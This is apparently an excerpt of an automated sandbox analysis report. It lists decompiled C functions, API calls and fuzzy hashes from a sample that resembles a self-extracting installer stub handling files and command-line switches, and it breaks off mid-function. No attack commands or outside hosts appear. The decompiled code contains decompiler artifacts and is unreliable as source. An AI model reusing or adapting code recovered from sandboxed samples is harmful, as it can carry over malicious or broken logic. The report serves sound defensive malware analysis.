                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00F34A23,?,00F34F67,*MEMCAB,00008000,00000180), ref: 00F348DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00F34F67,*MEMCAB,00008000,00000180), ref: 00F34902
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 007286084d36b2904d378b0e652dd4bfe68af73399bfeb1acaf7a3205b0ba6e7
                                                                        • Instruction ID: bbe75baaaac6726016453a24a17a9c41ce71563ce846e91bab7f343d6fd6416c
                                                                        • Opcode Fuzzy Hash: 007286084d36b2904d378b0e652dd4bfe68af73399bfeb1acaf7a3205b0ba6e7
                                                                        • Instruction Fuzzy Hash: A50169A3E125742AF32490298C88FB7651DCBD6734F1B0334BDEAE72D2D564AC04A1E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F34AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0xf3858c; // 0x268
                                                                        				_t9 = E00F33680(_t20);
                                                                        				if( *0xf391d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0xf38d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0xf39400; // 0x40400
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0xf39400 = _t15;
                                                                        							if( *0xf38184 != 0) {
                                                                        								_t21 =  *0xf38584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf393f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                          • Part of subcall function 00F33680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F3369F
                                                                          • Part of subcall function 00F33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336B2
                                                                          • Part of subcall function 00F33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F34B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 340955b13495c215203c0d35237466250ff7fd4b2a1184d70f7da6669ef18ee4
                                                                        • Instruction ID: bf011d34dc07c5783e3825367f5be21c2b8a5f3d38e00f2274309b1578a1d512
                                                                        • Opcode Fuzzy Hash: 340955b13495c215203c0d35237466250ff7fd4b2a1184d70f7da6669ef18ee4
                                                                        • Instruction Fuzzy Hash: 3501B531600309ABDB149F59DC05BA6B75AFB84735F048265F9399B1F1CBB4E812FB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F3658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0xf38b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0xf38b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E00F316B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}













                                                                        APIs
                                                                        • CharPrevA.USER32(00F38B3E,00F38B3F,00000001,00F38B3E,-00000003,?,00F360EC,00F31140,?), ref: 00F365BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: 20c4888a9347dd950afb0d7262f1968e5f760b699771d7802c8e66cac6584037
                                                                        • Instruction ID: 5f758e793f92eb4ce9e5f0afd162a3d5bc758e26f7d423a12df6e88e864139cc
                                                                        • Opcode Fuzzy Hash: 20c4888a9347dd950afb0d7262f1968e5f760b699771d7802c8e66cac6584037
                                                                        • Instruction Fuzzy Hash: 4FF02833504250BBD331091A9884BA6BFDA9B86370F2C817AE8DAC3305CA658C45A2B4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F3621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E00F3597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E00F344B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E00F36CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}












                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F3623F
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: 07423c03d3ac3780496d338d93eda6df1806838d551ad08bd899b2ecdd3abbbb
                                                                        • Instruction ID: 7c093404563bc3491d400414a3543253200d60f2c4c254a884f393bdcf25f926
                                                                        • Opcode Fuzzy Hash: 07423c03d3ac3780496d338d93eda6df1806838d551ad08bd899b2ecdd3abbbb
                                                                        • Instruction Fuzzy Hash: F2F0E9B0704208BBDB50EB748D06FBF33ADDB54720F414069B9C5D6191DDB8DD44A650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0xf38d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xf38d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0xf38d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf38d6c)) = 0;
                                                                        				return 0;
                                                                        			}






                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F34FA1,00000000), ref: 00F34B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 674169ce542a271a7226143c06df6a34427d89d4c9b59f45791e96f78132f9b9
                                                                        • Instruction ID: ae7c5efed95b6d43bac1e8b0c4652f379335c7de43c59ad72c09b3acc65d4a99
                                                                        • Opcode Fuzzy Hash: 674169ce542a271a7226143c06df6a34427d89d4c9b59f45791e96f78132f9b9
                                                                        • Instruction Fuzzy Hash: 81F0F471900B089E47618E399C00652FBE5AAF53B0750092AB4AED2190FB34B542FB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F366AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}





                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,00F34777,?,00F34E38,?), ref: 00F366B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 966cff803ea6bcba97d07b0c6f631ed4092a59528e03c780b2d87fa7d2079c53
                                                                        • Instruction ID: e411fdd1a329e5a574d59583015d41b91b4bc54507f526b9fb9aff07c76bf1ff
                                                                        • Opcode Fuzzy Hash: 966cff803ea6bcba97d07b0c6f631ed4092a59528e03c780b2d87fa7d2079c53
                                                                        • Instruction Fuzzy Hash: BDB092B6622444526A2406726C2A55A3846A6C123ABE45B90F032C11E0CA3EC846E004
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00f34caa
                                                                        0x00f34cb1

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00F34CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: 37cc40ff26369961c8cb86e1ad0b34360abea363d570ad2cae7134f543db14ca
                                                                        • Instruction ID: 0cef58097594c3fbaabab30a253b9b360a416f52ae7da61bfa4571ce1301401e
                                                                        • Opcode Fuzzy Hash: 37cc40ff26369961c8cb86e1ad0b34360abea363d570ad2cae7134f543db14ca
                                                                        • Instruction Fuzzy Hash: 89B0123204430CB7CF001FC3EC09F853F1EE7C4771F140040F60C450508A7294109696
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F34CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00f34cc8
                                                                        0x00f34ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: 242dc43dc11564f61ac0089def906d4e3478d13e7ef772c647d4f54f8279cab9
                                                                        • Instruction ID: aa1b02d6bdd4870ffc77c7f9ed4120326adc8db0aab9edf63164de58840132bc
                                                                        • Opcode Fuzzy Hash: 242dc43dc11564f61ac0089def906d4e3478d13e7ef772c647d4f54f8279cab9
                                                                        • Instruction Fuzzy Hash: B9B0123100010CB78F001B43EC088453F1ED6C02707000050F50C410218B3398119585
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00F35C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E00F36CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E00F36E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0xf38004; // 0xc69e30f7
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E00F3597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E00F344B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0xf39124 = E00F36285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E00F36CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E00F344B9(0, 0x521, 0xf31140, 0, 0x40, 0);
                                                                        												_t85 =  *0xf38588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E00F3667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E00F3667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E00F35C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E00F31680(0xf38c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E00F3667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E00F3667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0xf38a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E00F35C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0xf38b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0xf38a3a;
                                                                        																}
                                                                        																E00F31680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E00F3658A(_t218, 0x104, 0xf31140);
                                                                        																if(E00F331E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0xf38a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0xf38a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0xf38a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0xf38a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0xf38a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
